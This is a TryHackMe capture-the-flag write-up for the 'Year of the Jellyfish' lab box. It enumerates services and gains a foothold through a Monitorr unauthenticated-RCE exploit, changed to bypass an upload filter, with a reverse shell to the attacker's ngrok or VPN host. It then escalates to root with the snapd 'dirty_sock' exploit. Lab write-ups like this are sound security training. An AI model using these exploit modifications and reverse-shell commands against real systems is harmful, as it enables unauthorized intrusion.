# YEAR OF THE JELLYFISH

> TryHackMe

**(This box deploys with a public IP, so I will have to do some things differently, and tread carefully so I don't get the attention of my ISP)**

## Enumeration

    sudo nmap -v -T2 -sC -sV -oN nmap-initial robyns-petshop.thm

I ran the scan more slowly so I wouldn't piss off my ISP (`-T2`).

### Ports and Services

![nmap image](img/nmapinitial.png)

We have ports 21, 22, 80, 443 and 8000 open, upon scanning the top 1000 ports. A more thorough scan reveals a service running on port 8096 and port 22222.

#### 21 - FTP - vsftpd 3.0.3

This service is not configured to allow anonymous access, and I don't know the password. Since the domain is called 'robyns-petshop.thm' I bet that robyn is a valid username, however.

![ftp enumeration](img/ftp-enum.png)

This version of vsftpd does not appear to have any known vulnerabilities at the time of writing.

#### 22 - SSH - OpenSSH 5.9p1 Debian

I already know that robyn is probably a valid username, but I don't have a password yet. The version is kind of old, but exploiting SSH is not exactly low-hanging fruit, so time to move on. There is also another SSH instance running on port 22222, but it is version 7.6p1, so that is interesting.

#### 80/443 - HTTP/HTTPS - Apache 2.4.29

There is a lot to unpack here, as the nmap scan does reveal more subdomains, so it is likely there is some attack vector here. The main page is the website for a petshop, and it has pictures of cute animals and tells us the shop is in Bristol.

![petshop homepage](img/petshop.png)

There is nothing fishy here (pardon the pun). The other subdomains have more stuff to go through.

There is a 'beta' and a 'dev' version of the petshop - the beta page reveals that there could be some content if I have the right ID to append to the URL:

![beta site](img/beta.png)

It is also accessible in http on port 8000.

The 'dev' page looks to be simply a clone of the regular homepage, so nothing much there.

Lastly, there is 'monitorr.robyns-petshop.thm', which is a web interface for monitoring system usage - this leaks what service is running on port 8096 (a JellyFin instance, which is a home media server app). Here is the JellyFin page:

![jellyfin login page](img/jellyfin.png)

It has a login page, but again I have no credentials so that is put aside. The 'monitorr' page is more interesting:

![monitorr](img/monitorr.png)

It has some goofy graphics reminiscent of the late 90s or something. At the bottom of the page is a link to the github page for it, and it tells me the version, which happens to be the most recent.

![monitorr version](img/monitorr-version.png)

Most recent in this case is 2018, so there must be some vulnerabilities.

![searchploit monitorr](img/searchsploit.png)

## Exploitation

So there are two potential exploits for this specific version of monitorr - this must be the vector for initial foothold. The github page says monitorr is a PHP web-app, so perhaps it is possible to get some kind of code execution using PHP. Let's look at the first exploit:

    searchsploit -x 48981

![Authorization Bypass](img/exploit-1.png)

This is a simple python script that creates an admin account by abusing the monitorr installation URL.

What about the second exploit?

    searchsploit -x 48980

![Unauthenticated RCE](img/exploit-2.png)

This one bypasses authentication completely and uploads a simple PHP reverse shell, apparently disguised as a GIF. It looks like there is an upload dir that is accessible - let's check it out in the browser:

![monitorr upload directory](img/upload-dir.png)

### Exploit Method

So let's try these in order. The first one requires the target URL, a username, email and password in order to run the exploit and create the admin account. I give it all that, but unfortunately I get an SSL error. 

![SSL error](img/error.png)

This prompts me to check if that path (`/assets/config/_installation/_register.php`) even exists, and it turns out that it does not:

![missing path](img/config.png)

I don't think the exploit will work if those specific files are nonexistent, nevermind the SSL error. So that means I need to try exploit number 2, the unauthenticated RCE.

This one will require me to do something differently, however. If I want to get a connection back to my machine, I would need to forward a port in my router since I am attacking a public IP - I am not connected to a VPN in this case. Instead I'm going to use 'ngrok', which is a secure tunneling service that once running, will give me a public IP that connects directly back to my box on a local port of my choosing. I've never used this before so I'll probably screw up a lot until I figure out what I'm doing wrong. Fun!

    ngrok tcp 443

That command starts a regular tcp tunnel and will forward the traffic to my listening netcat, on port 443. Where the exploit asks for a local host and port, instead of adding my actual IP address and port I use the ngrok tunnel IP and it's port (the free version chooses both randomly).

The full command I used was:

```bash
python3 rce.py https://monitorr.robyns-petshop.thm 4.tcp.ngrok.io 15737
```

And I got another SSL error. So I modified the script to not verify the certificate (which you should really never do, but since I know this is a THM machine I am ok with it. I modified the script in two places - where it makes a post request and where it makes the get request - by simply adding "verify=False" within the brackets. For good measure I also added a "print(response.txt)" after making the post request a variable (called "response") so I could see what the server sent back.

I got something unexpected:

![server response](img/response.png)

So it could tell I uploaded an exploit. I went back to the upload.php page and examined the request to see if the exploit was missing anything, and it was. There is a cookie set that the python script does not include - "isHuman". So I added that to the script as well and appended it to the post and get requests:

![cookie](img/cookie.png)

I tried again, and it still didn't work. That could indicate some kind of file extension filtering going on, even though the upload tries to masquerade as a GIF. I changed the extension (in two places, because the exploit calls the uploaded file after uploading it) so that it was "shell.gif.php" but that didn't work. I don't want to bother with swapping the extensions because I want the file to be executed as php, so I'll have to try another php extension. There are quite a few:

![PHP file extensions](img/php-extensions.png)

The one that worked was 'phtml' - but I still couldn't get a connect back to my machine. This messed with me for quite a while until I thought to scrap using ngrok and just connect to the THM VPN as usual and use that address instead of the ngrok instance. I suppose if I opted for the paid version of ngrok I could specify the port, since I think that there is some egress filtering on the machine and it doesn't like connecting to a random high port.

Anyway, so the command that got me a reverse shell on the box was:

```bash
python3 rce.py https://monitorr.robyns-petshop.thm <my VPN IP> 443
```

![www-data shell](img/www-shell.png)

## Privilege Escalation - low-priv > high-priv

### Further Enumeration

On the box I am the www-data, pretty unprivileged. But the "user" flag happens to be in the `/var/www` directory, indicating that this was the correct foothold.

![First flag](img/flag1.png)

The user robyn's home directory was not that interesting, but one interesting find was an SSH honeypot in the `/opt` dir - it turns out that the service running on port 22 was a honeypot, which means the real service is probably the one running on port 22222.

![SSH honeypot](img/honeypot.png)

Anyway I uploaded linpeas to do my enumeration for me, and noted that once again I had to serve my stuff on a typical port (I used 80) in order for the box to make a connection. I also noted that the box does also have a VPN IP address, so there must be some other reason it has a public IP.

#### Linpeas results

Firstly, I noted the iptables rules that restrict outbound connections from most ports except those specified:

![iptables rules](img/iptables.png)

There was something about a snapd socket that is owned by root:

![sockets](img/linpeas-sockets.png)

And I didn't really know what to make of it until I found an SUID binary that also involved snapd:

![snapd-confine](img/suid.png)

So I checked [gtfobins](https://gtfobins.github.io/gtfobins/snap/) for snap and there is an entry, but it doesn't apply here. However, there is a clue in the linpeas output:

![CVE](img/CVE.png)

There are two local privesc exploits for snapd in searchsploit:

![searchsploit snapd](img/ss-snapd.png)

The version of snapd vulnerable to this exploit is any version below 2.3.7. Which version is running on this machine?

![snapd version](img/snapd-version.png)

Nice!

### Exploit method

So, after looking at the two different exploits, I opted for the second version, because the first version requires you to create an online account at Ubuntu SSO, as well as an SSH service accessible via localhost, which is kind of a pain. The second version doesn't require any of that, but is more intrusive since it sideloads an empty snap and uses it to create a new user with full sudo privileges. I'm going with that one since this is for fun. The exploit creates a new user 'dirty_sock', with the password being the same. All I have to do is transfer the script over to the machine and run it with no arguments:

    python3 dirtysock.py

![running the exploit](img/dirtysock.png)

I was unable to su to the user, but I got the idea to try SSH (on port 22222) and I was able to get access as the dirty_sock user that way:

![SSH session as dirty_sock](img/user.png)

OK, time to become root:

![I am root](img/root-shell.png)

**Flag**  
![root flag](img/root-flag.png)

## Conclusion

This was a really fun and challenging box. The public IP portion of it was an interesting and complicating thing, even though there is an offline version of the privesc. I like how the initial foothold exploits didn't work out of the box - it helped me to get better at modifying public exploits, which I know is pretty realistic. 

**Steps taken:**

* Discover subdomains via nmap scan
* Enumerate services running on subdomains, find exploit for monitorr app
* Modify exploit to bypass filters/checks, get reverse shell
* Enumerate box, find exploit for unpatched version of snapd
* Use dirtysock exploit to create new user with sudo privs
* Escalate to root via `sudo bash`
